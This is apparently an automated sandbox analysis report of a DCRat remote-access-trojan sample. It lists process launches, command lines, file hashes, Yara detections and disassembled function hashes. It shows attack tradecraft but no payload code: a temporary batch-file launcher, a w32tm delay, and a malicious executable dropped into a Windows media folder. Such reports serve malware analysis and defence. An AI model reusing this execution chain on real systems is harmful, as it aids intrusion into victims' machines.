MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	07:06:59
Start date:	27/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\eE9QbXcUOX.bat"
Imagebase:	0x7ff713080000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	07:06:59
Start date:	27/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	07:06:59
Start date:	27/07/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff6a5d70000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	07:07:00
Start date:	27/07/2024
Path:	C:\Windows\Media\Sonata\wRRcPdViqk.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Media\Sonata\wRRcPdViqk.exe
Imagebase:	0xb20000
File size:	1'170'944 bytes
MD5 hash:	1A9C19CD373F9CE0642F18F6965521B3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000A.00000002.1774437286.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 84%, ReversingLabs Detection: 69%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	07:07:00
Start date:	27/07/2024
Path:	C:\Windows\Media\Sonata\wRRcPdViqk.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Media\Sonata\wRRcPdViqk.exe
Imagebase:	0x1e0000
File size:	1'170'944 bytes
MD5 hash:	1A9C19CD373F9CE0642F18F6965521B3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000B.00000002.1716375349.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	07:07:04
Start date:	27/07/2024
Path:	C:\Windows\Media\Sonata\wRRcPdViqk.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Media\Sonata\wRRcPdViqk.exe"
Imagebase:	0xb80000
File size:	1'170'944 bytes
MD5 hash:	1A9C19CD373F9CE0642F18F6965521B3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000C.00000002.1818454348.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Function 00007FFD9B891090 Relevance: 9.0, Strings: 7, Instructions: 223COMMON

Download Yara Rule

Strings

#, xrefs: 00007FFD9B89168C
-, xrefs: 00007FFD9B8914F6
{, xrefs: 00007FFD9B891525
., xrefs: 00007FFD9B891886
", xrefs: 00007FFD9B8912F3
%, xrefs: 00007FFD9B891625
[, xrefs: 00007FFD9B891724

Memory Dump Source

Source File: 00000000.00000002.1691923706.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_QT4aLb3P98.jbxd

Similarity

API ID:
String ID: "$#$%$-$.$[${
API String ID: 0-517179316
Opcode ID: 31f5b877e48b438683cf5f4e23c150c15e8a60aee9903bdcfcef2a25512f08c3
Instruction ID: cd0c559a13a2503f15b8daa2681a6e6976d4043eafb3a8a2221da34df0d6c185
Opcode Fuzzy Hash: 31f5b877e48b438683cf5f4e23c150c15e8a60aee9903bdcfcef2a25512f08c3
Instruction Fuzzy Hash: F4A1B670E0962D8FEF68DF94C8647EDBAB2BF48305F5141B9D40DA7291CB385A84DB41

Function 00007FFD9B8833B0 Relevance: 1.7, Strings: 1, Instructions: 478COMMON

Download Yara Rule

Strings

N_H, xrefs: 00007FFD9B88376E

Memory Dump Source

Source File: 00000000.00000002.1691923706.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_QT4aLb3P98.jbxd

Similarity

API ID:
String ID: N_H
API String ID: 0-343878021
Opcode ID: a317534a829a147e6b1a4c8e2a561c29a1508a4873d35228cbac6a7badf81fd4
Instruction ID: a31c66be26bc8865f5f7928c189a491827739350b3491f849684cfbae64646ac
Opcode Fuzzy Hash: a317534a829a147e6b1a4c8e2a561c29a1508a4873d35228cbac6a7badf81fd4
Instruction Fuzzy Hash: 74F1D131A0DA8E8FEB55EB68C8657AD7BE0FF5A310F5001BAD019C72E6DB786841C741

Function 00007FFD9B889C9F Relevance: 1.1, Instructions: 1083COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691923706.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_QT4aLb3P98.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04703c43e662381215f4651229d3c9773837262088410ad14e94d06e29b6c9ef
Instruction ID: 4bdaaf2f2a1701b741f72c83653e98b4ba1023afa4a389de5fa789f3f800bedb
Opcode Fuzzy Hash: 04703c43e662381215f4651229d3c9773837262088410ad14e94d06e29b6c9ef
Instruction Fuzzy Hash: 38828130A0EA8E9FDB96EF64C8695F97BF0FF1A300F0605BAD419C71A6DA34A544C741

Function 00007FFD9B88C230 Relevance: .9, Instructions: 892COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691923706.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_QT4aLb3P98.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b201756263791f9f3b03d583f9e4fdb3ae52dc302b221090a7383de87700fa5
Instruction ID: 70334769bb88539a6b54109ef3b5f622ca35618b0662687a895959eddbe65e83
Opcode Fuzzy Hash: 3b201756263791f9f3b03d583f9e4fdb3ae52dc302b221090a7383de87700fa5
Instruction Fuzzy Hash: 7F629130A0EA4E8FDB65EF64C8696F97BF0FF19304F0505BBD419C61A6DA38A644CB41

Function 00007FFD9B894100 Relevance: .8, Instructions: 836COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691923706.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_QT4aLb3P98.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 821e84f5b7395ba806e0cffd1606168173441b644954c45ad25cdfc46ba6b3b4
Instruction ID: 923b1133465b171db3781ddec0c7611735d3caf309e263afa141d9c128a92795
Opcode Fuzzy Hash: 821e84f5b7395ba806e0cffd1606168173441b644954c45ad25cdfc46ba6b3b4
Instruction Fuzzy Hash: 5652A431A0E68E4FEB669B7488755F97FE0FF1A200F0905BFD458C71E2EA286644C742

Function 00007FFD9B8935C8 Relevance: .7, Instructions: 740COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691923706.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_QT4aLb3P98.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e33a30ab0a55ac37dbac23d75a690d9aec491ee3229d38d2a5d2ed215c3b2c1c
Instruction ID: 28561762a311d0ffa97bebfb903b3e11c161e532c5a71deab7afa1ce3417ab35
Opcode Fuzzy Hash: e33a30ab0a55ac37dbac23d75a690d9aec491ee3229d38d2a5d2ed215c3b2c1c
Instruction Fuzzy Hash: 31429030A0E68E8FEB65EF64C8696B97BF0FF19304F0505BED419C71A6DA38A644C741

Function 00007FFD9B894268 Relevance: .7, Instructions: 689COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691923706.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_QT4aLb3P98.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f03e17763f284929e97e5061d171a82023979a7d820c7747fa27db6468bdf38
Instruction ID: f25a9331fc4da1552500149219541aa36c9852c985d1daf7dabe74467acb2573
Opcode Fuzzy Hash: 1f03e17763f284929e97e5061d171a82023979a7d820c7747fa27db6468bdf38
Instruction Fuzzy Hash: EA329671A0E68E8FEF659F6488655F97FE0FF19300F0905BED418C61E2EA7866448742

Function 00007FFD9B894C40 Relevance: .4, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691923706.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_QT4aLb3P98.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5c62adb582db79a7d0087066999c49999b9a092441528a1dcd6403fa3258c9c
Instruction ID: 64874ef1c98689c17a557f483d51dac9cb4a36d218834ba948c8cf31050db219
Opcode Fuzzy Hash: c5c62adb582db79a7d0087066999c49999b9a092441528a1dcd6403fa3258c9c
Instruction Fuzzy Hash: 18D1B030A0AA4E8FEBA5EB6488696FD7BF0FF19304F0505BED419C71A6DE34A644C741

Function 00007FFD9B88CC28 Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691923706.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_QT4aLb3P98.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a148a8d5e678119f412431c3983cb2e76a7e25412ba8a3737e25a589418b57c4
Instruction ID: 9f14adf2ede0834f601ac648bf366e283bc1b2883439f985fefb2731486d32fb
Opcode Fuzzy Hash: a148a8d5e678119f412431c3983cb2e76a7e25412ba8a3737e25a589418b57c4
Instruction Fuzzy Hash: 72D1B230A0AA4E8FEBA9EB6488696FD7BF1FF19300F0505BED419C71A2DE356644C741

Function 00007FFD9B88C420 Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691923706.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_QT4aLb3P98.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43ef68925db8c922f7d200dddaefa0efe8521281a9abb36ea094deff66e6099e
Instruction ID: add8ea0356e6bf80ea127d0514bfc58349a8cce9716984e60e44a325cbbcae10
Opcode Fuzzy Hash: 43ef68925db8c922f7d200dddaefa0efe8521281a9abb36ea094deff66e6099e
Instruction Fuzzy Hash: 9DC1E030A09A4E8FDB95EF68C8696F93BF0FF19314F0104BBD459C70A6DA38A585CB40

Function 00007FFD9B88A68D Relevance: .4, Instructions: 359COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691923706.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_QT4aLb3P98.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 579f7a04ef681393e9910e924068dcdd40ba956306a9eabee882f778816ac805
Instruction ID: 05df639ca81b96d764df3260c71788fe5da49990a997ac18926ad442259bb687
Opcode Fuzzy Hash: 579f7a04ef681393e9910e924068dcdd40ba956306a9eabee882f778816ac805
Instruction Fuzzy Hash: 4AC1E030A0EA8E9FD756EB64C8685E97BF0FF09304F0605BBC429C70E6EA38A544C751

Function 00007FFD9B88F75E Relevance: 2.6, Strings: 2, Instructions: 55COMMON

Download Yara Rule

Strings

J, xrefs: 00007FFD9B88F7F1
", xrefs: 00007FFD9B88F767

Memory Dump Source

Source File: 00000000.00000002.1691923706.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_QT4aLb3P98.jbxd

Similarity

API ID:
String ID: "$J
API String ID: 0-2741568180
Opcode ID: b969d8f468eec12f06d0e1d0e69c76159b126ccc953173e721b7b707fc723964
Instruction ID: 463d8277c9fa03cdd20b0e0bd93dafb4e3c32014f37a26863c95011785d62712
Opcode Fuzzy Hash: b969d8f468eec12f06d0e1d0e69c76159b126ccc953173e721b7b707fc723964
Instruction Fuzzy Hash: 9821C770E0A62E8FDB64DF58D9547F9B7B1EB58301F0001BA951DE22A1CA745A808F40

Function 00007FFD9B88E409 Relevance: 2.5, Strings: 2, Instructions: 41COMMON

Download Yara Rule

Strings

{, xrefs: 00007FFD9B88E41D
9, xrefs: 00007FFD9B88F43C

Memory Dump Source

Source File: 00000000.00000002.1691923706.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_QT4aLb3P98.jbxd

Similarity

API ID:
String ID: 9${
API String ID: 0-3804515871
Opcode ID: e7da5ebfc3359aa7df06b1a63f6d42e488db62057920a405d2364fa9b37e3e39
Instruction ID: a42fcb0c786ef49c53eb2dddc3bbf775bc7e44b9c920a57623466849d9d2e820
Opcode Fuzzy Hash: e7da5ebfc3359aa7df06b1a63f6d42e488db62057920a405d2364fa9b37e3e39
Instruction Fuzzy Hash: 3411E670A09A2E8BDB74DF14C9547A877B1AB58301F1044BAD409A62A1CB385B80CF41

Function 00007FFD9B88ECC8 Relevance: 1.3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

5, xrefs: 00007FFD9B88ECD5

Memory Dump Source

Source File: 00000000.00000002.1691923706.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_QT4aLb3P98.jbxd

Similarity

API ID:
String ID: 5
API String ID: 0-2226203566
Opcode ID: 04ecaacf0fc4634620cefe8cc36ff06eed0d28e07f1d1cea3c53d239215cb9d0
Instruction ID: c5b88f5aad81003fd43dfda20901dce37f7f04cd48b412f124139b2885290b94
Opcode Fuzzy Hash: 04ecaacf0fc4634620cefe8cc36ff06eed0d28e07f1d1cea3c53d239215cb9d0
Instruction Fuzzy Hash: E5314E70E09A5E8BEB68DF649C697A9B7F1EF58301F4441FAD01DD62A1DE342A81CF01

Function 00007FFD9B894B0D Relevance: .6, Instructions: 614COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691923706.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_QT4aLb3P98.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ee4ec5267c58214faa6f690d19c9ffae6be5c410e87b1e9689b4125beba5913
Instruction ID: 53938ea8493647a0ca95da947027c9a122aec9f9c316751eed315476e7145e04
Opcode Fuzzy Hash: 1ee4ec5267c58214faa6f690d19c9ffae6be5c410e87b1e9689b4125beba5913
Instruction Fuzzy Hash: 1B227F30A0A68E8FEFA5EBA488696FD7BF0FF19300F0505BED419C71A6DE3865458741

Function 00007FFD9B894418 Relevance: .6, Instructions: 556COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691923706.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_QT4aLb3P98.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 180ab5ee08232cce1b181ab0874888a2505a546bb048ecf3b9c3a61cecab0bc1
Instruction ID: e28f487bb0ba7da7bd2fe788c62966dac8c9127642ccb8b82e8622e3609f0e11
Opcode Fuzzy Hash: 180ab5ee08232cce1b181ab0874888a2505a546bb048ecf3b9c3a61cecab0bc1
Instruction Fuzzy Hash: A9129671A0E68E8FEF65DF6488651F97FE0FF19300F0905BED458C61E2EA7865448742

Function 00007FFD9B88C1D0 Relevance: .6, Instructions: 554COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691923706.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_QT4aLb3P98.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9d97b2bec4568a982f22d3026fdfe68c980e1ff44c076ad7f4324e00adbeb75
Instruction ID: f5af50adff3dc1d7eea8bef7c4614bf95a690a57b5f58a09ad6303d28ffb36aa
Opcode Fuzzy Hash: e9d97b2bec4568a982f22d3026fdfe68c980e1ff44c076ad7f4324e00adbeb75
Instruction Fuzzy Hash: A012733090EB8E8FDB669B6488296F97FF0FF0A314F0605BBD458C60A6DB389654C741

Function 00007FFD9B895755 Relevance: .6, Instructions: 550COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691923706.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_QT4aLb3P98.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a7b91a3c4d3231eec50be1ddb643f583a681b7b907d492e8001b638be4142e7
Instruction ID: 194a08f4938e946eb2e0e754f6cbc545d82659811a4ff9091629f2f1c90f598d
Opcode Fuzzy Hash: 9a7b91a3c4d3231eec50be1ddb643f583a681b7b907d492e8001b638be4142e7
Instruction Fuzzy Hash: E5121774A0991E8FDBA4EF58C854AE9B7F1FF59304F0101AAD40DE32A1DB35AA81CB44

Function 00007FFD9B88AC68 Relevance: .5, Instructions: 527COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691923706.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_QT4aLb3P98.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08d8fb76d33694abde26df0d17ce59d20545bfd129cfc2408563c958cf9906dd
Instruction ID: bb47f1f8386707080cf97aa501b7a71b18f144875060c4874e7614872e4d526d
Opcode Fuzzy Hash: 08d8fb76d33694abde26df0d17ce59d20545bfd129cfc2408563c958cf9906dd
Instruction Fuzzy Hash: 4C127530A1EB8E8FDB659F6488296F97BF0FF19304F0505BBD458C61A6DB389644CB41

Function 00007FFD9B8935F0 Relevance: .5, Instructions: 503COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691923706.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_QT4aLb3P98.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 005c8170a875e26317c87a47712c7950eb2465367df495f80cd0548fa7b352bc
Instruction ID: cca7c04e1f8f1c7648b44d27f7d1894f6fbff1342d1234ff73d6764110b9733d
Opcode Fuzzy Hash: 005c8170a875e26317c87a47712c7950eb2465367df495f80cd0548fa7b352bc
Instruction Fuzzy Hash: CE029671A0E68E8FEF65DF6488652F97FE0FF19300F0905BED418C61E2EA78A5448742

Function 00007FFD9B88ACB0 Relevance: .5, Instructions: 494COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691923706.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_QT4aLb3P98.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26fe3c1dde254f781a5599c49a845f0c2eddc5929a7ef7be1566d4489367ec94
Instruction ID: f0c23b09f92369a491ca6d5e7f4c192da89ce3f2a25cff4cebe3290e493fbda2
Opcode Fuzzy Hash: 26fe3c1dde254f781a5599c49a845f0c2eddc5929a7ef7be1566d4489367ec94
Instruction Fuzzy Hash: 13023D71E19A5D8FEB68EBA8C8647B8B7B1FF59300F1001BED01DD72A6DA346941CB41

Function 00007FFD9B88C298 Relevance: .5, Instructions: 480COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691923706.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_QT4aLb3P98.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9bc7c83c0186fe6f1e48a66c88f42a7b585e2d6aedd93213e02ce54de5cd823
Instruction ID: 166d48951984e16ca319d1214d70471a48f8ad32433b39738775e80904af4a91
Opcode Fuzzy Hash: c9bc7c83c0186fe6f1e48a66c88f42a7b585e2d6aedd93213e02ce54de5cd823
Instruction Fuzzy Hash: 41025330A0EB8E8FDB659F6488296F97BF0FF19304F0505BBD458C61A6DB38A654CB41

Function 00007FFD9B894548 Relevance: .5, Instructions: 462COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691923706.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_QT4aLb3P98.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48f6f660e72a3d9d4802e723ebcf5d142f0192749d1e4c9c630ca046bd137f59
Instruction ID: caefa635d534d8973c245d965fd02996963b823244131cad6fec708495f39a69
Opcode Fuzzy Hash: 48f6f660e72a3d9d4802e723ebcf5d142f0192749d1e4c9c630ca046bd137f59
Instruction Fuzzy Hash: F4F1A771A0E68E8FEF75DF6488652F97FE0FF19300F0505BED458C61E2EA68A5448742

Function 00007FFD9B88CBC0 Relevance: .5, Instructions: 454COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691923706.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_QT4aLb3P98.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afb65282fe239c4c044502983721eb4ad8a4ae2a7ca602003144f12d98082c25
Instruction ID: b3b5c04065ae24c16c2ce9905d0661ce78d15ac6f48d9eb9edd8b826114dd7f3
Opcode Fuzzy Hash: afb65282fe239c4c044502983721eb4ad8a4ae2a7ca602003144f12d98082c25
Instruction Fuzzy Hash: 70F1B230A0E68E8FEF659B6488296FD7BA0FF19310F0505BAD459C61E6DF3866448B41

Function 00007FFD9B8938FA Relevance: .4, Instructions: 441COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691923706.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_QT4aLb3P98.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a60a8cfeb511cc9edc468cc29fc6b3d64c260e64d7bc9f4bf5cc37d4fdb7942
Instruction ID: c1f9cc32e6276be93fe73bf9c884abf94a123105234d377da0ae8e40958bd598
Opcode Fuzzy Hash: 2a60a8cfeb511cc9edc468cc29fc6b3d64c260e64d7bc9f4bf5cc37d4fdb7942
Instruction Fuzzy Hash: 87F11D70E09A1D8FDBA5EB98C8657E9BBF1FF58311F0101BAD00DE7291DA346A85CB40

Function 00007FFD9B8945E8 Relevance: .4, Instructions: 413COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691923706.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_QT4aLb3P98.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f421d8c65eaab3aa5ccc9d38a7ba32958d6bfeeff947e84270b0bcea4d5fff0
Instruction ID: 03ce9c6150e384817a0f0a31282477ee240573d12ef866c4d803a92234b8c060
Opcode Fuzzy Hash: 0f421d8c65eaab3aa5ccc9d38a7ba32958d6bfeeff947e84270b0bcea4d5fff0
Instruction Fuzzy Hash: 10D1B771A0E68E8FEF75DF6488652F97FE0FF19300F0905BED458C61E2EA68A5448742

Function 00007FFD9B882C40 Relevance: .4, Instructions: 411COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691923706.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_QT4aLb3P98.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85a124b253dc5de8ccffa36461e266c5424f744d7c479c3d8e827863b5ab3a36
Instruction ID: cf1f9a7a06c91cc612cd444dcdadaa342ee414a0037d4200f456282e2a472e4c
Opcode Fuzzy Hash: 85a124b253dc5de8ccffa36461e266c5424f744d7c479c3d8e827863b5ab3a36
Instruction Fuzzy Hash: 2FD1B130A0EA4E8FE761EFB8C8699E97BE1FF19310F0505B6D418C70A6DA38A645C751

Function 00007FFD9B88D6A8 Relevance: .4, Instructions: 405COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691923706.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_QT4aLb3P98.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd6edd1ebae50348bde14387d45c8b41d3e4ac0d59380efc714fa5c20535b29c
Instruction ID: 6913e20655d7e8f644c80fb8581249f6ee51caa9bf2dc63c0c0d643816d720f1
Opcode Fuzzy Hash: bd6edd1ebae50348bde14387d45c8b41d3e4ac0d59380efc714fa5c20535b29c
Instruction Fuzzy Hash: 46E16171A19A8D8FEBA9EB58C8647B8B7B1FF19300F0501BED01DD71E2DA386945CB41

Function 00007FFD9B8919BF Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691923706.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_QT4aLb3P98.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d68059cef85496fbc8efd6e2f069910da764918a0ee2e330ef718ff8316a9b4
Instruction ID: 44ae7bf4758c74b96906ad969dcd1f0d61e555562439c11da07d68ed16222c65
Opcode Fuzzy Hash: 1d68059cef85496fbc8efd6e2f069910da764918a0ee2e330ef718ff8316a9b4
Instruction Fuzzy Hash: 62E1B13090E7CA8FDB569F6488656E93FF0EF16304F0605EBD458C71A3DA38AA58C752

Function 00007FFD9B895BC1 Relevance: .4, Instructions: 369COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691923706.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_QT4aLb3P98.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae7e57e652d0497fcbb80e8aeddccb8c2b1c53c9e9cf8cac02b3f908e9e81b7b
Instruction ID: 09bd5a7b3ad15b19f748e71514979cfb2fceb1efc8e2e9cbfb2f365dcefe96d3
Opcode Fuzzy Hash: ae7e57e652d0497fcbb80e8aeddccb8c2b1c53c9e9cf8cac02b3f908e9e81b7b
Instruction Fuzzy Hash: D1D18170A0E78E8FEFA59F6488696FD7BB0FF19300F0505BAD459C61A2DB386644CB41

Function 00007FFD9B88D758 Relevance: .3, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691923706.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

